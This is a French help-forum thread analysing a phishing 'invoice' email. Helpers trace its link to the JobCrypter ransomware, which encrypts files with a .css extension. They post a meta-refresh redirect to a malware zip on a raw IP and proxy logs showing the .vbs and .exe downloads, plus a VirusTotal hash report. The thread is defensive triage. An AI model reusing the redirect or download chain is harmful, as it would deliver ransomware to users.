Bonjour,
J'ai reçu ceci :
qui me semble bien suspect et me suis bien gardé de cliquer sur les liens.
Comment fait-on pour vérifier que ce mail (via Thunderbird) contient des éléments malicieux. Avec le clic droit je ne vois pas la possibilité d'analyser avec Avast.
e-mail douteux : Locker .css
Modérateurs : Mods Windows, Helper
e-mail douteux : Locker .css
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
- Messages : 113154
- Inscription : 10 sept. 2005 13:57
Re: e-mail douteux
Salut,
oui il est bidon,
tu peux donner le lien pour voir ?
Tu fais un clic droit dessus, copier le lien et tu le donnes ici.
oui il est bidon,
tu peux donner le lien pour voir ?
Tu fais un clic droit dessus, copier le lien et tu le donnes ici.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Re: e-mail douteux
Merci pour cette réponse, ce lien ci ayant trait à la sois-disant facture ? :
87.106.145.33/1/
edit :
par sécuriré J'ai simplement recopié le texte pour éviter la propagation intempestive...
87.106.145.33/1/
edit :
par sécuriré J'ai simplement recopié le texte pour éviter la propagation intempestive...
- Messages : 31840
- Inscription : 28 févr. 2008 13:58
- Localisation : Breizhilienne

Re: e-mail douteux
ouai ça charge un .js pourri
https://www.virustotal.com/en/file/e8b4 ... 486376699/
https://www.hybrid-analysis.com/sample/ ... mentId=100
Code : Tout sélectionner
<meta http-equiv="refresh" content="0;url=hxxp://87.106.145.33/555500.zip">
https://www.hybrid-analysis.com/sample/ ... mentId=100
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique
Merci.

https://helicium.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Un p'tit Don à Angélique


- Messages : 113154
- Inscription : 10 sept. 2005 13:57
Re: e-mail douteux : Locker .css
Merci c'est interressant.
C'est ce crétin : JobCrypter - locked extension .css
Il y a un vbs, donc les utilisateurs de Marmiton sont protégés.
Locker.exe puis les fichiers sont chiffrés avec l'extension .css
Après gros plantages :
C'est ce crétin : JobCrypter - locked extension .css
Code : Tout sélectionner
1455036575.974 79 192.168.1.101 TCP_MISS/200 398 GET http://87.106.145.33/1/ - DIRECT/87.106.145.33 text/html
1455036576.040 39 192.168.1.101 TCP_MISS/200 1440 GET http://87.106.145.33/555500.zip - DIRECT/87.106.145.33 application/x-zip-compressed
1455036598.756 39 192.168.1.101 TCP_MISS/200 4897 GET http://87.106.145.33/1.vbs - DIRECT/87.106.145.33 text/vbscript
1455036598.756 39 192.168.1.101 TCP_MISS/200 4897 GET http://87.106.145.33/1.vbs - DIRECT/87.106.145.33 text/vbscript
1455036678.177 1112 192.168.1.101 TCP_MISS/200 505681 GET http://87.106.145.33/22.exe - DIRECT/87.106.145.33 application/octet-stream
Locker.exe puis les fichiers sont chiffrés avec l'extension .css
Après gros plantages :
SHA256: 383cdd0d52de2b9a0944ae39daaf8d9b5dbb4e70c42670b6a41de853b030f49b
Nom du fichier : fff.exe
Ratio de détection : 8 / 56
Date d'analyse : 2017-02-06 10:44:24 UTC (il y a 1 minute)
Antivirus Résultat Mise à jour
AegisLab DangerousObject.Multi.Gen.mzhg 20170206
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9959 20170125
CrowdStrike Falcon (ML) malicious_confidence_94% (D) 20170130
Cyren W32/Symmi.O2.gen!Eldorado 20170206
F-Prot W32/Symmi.O2.gen!Eldorado 20170206
Ikarus Trojan.MSIL.Agent 20170206
Invincea trojan.win32.skeeyah.a!rfn 20170203
Qihoo-360 HEUR/QVM10.1.0000.Malware.Gen 20170206
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Re: e-mail douteux : Locker .css
Bien, de mon côté rien de spécial à faire comme action à part mettre ce mail à la poubelle? Avast! Et Malwarebytes Anti-Malware (MBAM ) restent calmes.
- Messages : 113154
- Inscription : 10 sept. 2005 13:57
Re: e-mail douteux : Locker .css
Tu n'as pas ouvert le lien, ni télécharger le zip j'imagine
donc ils ne vont rien détecter.
donc ils ne vont rien détecter.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
➔ Comment protéger son PC des virus
➔ Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11
Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
-
- Sujets similaires
- Réponses
- Vues
- Dernier message
-
- 1 Réponses
- 108 Vues
-
Dernier message par Parisien_entraide
-
- 26 Réponses
- 340 Vues
-
Dernier message par angelique
-
-
Piratage de boite mail : vérification de virus [résolu]
par Legoman » » dans Windows : Résoudre les problèmes - 20 Réponses
- 269 Vues
-
Dernier message par Legoman
-
-
- 4 Réponses
- 205 Vues
-
Dernier message par Teniol
-
- 1 Réponses
- 67 Vues
-
Dernier message par angelique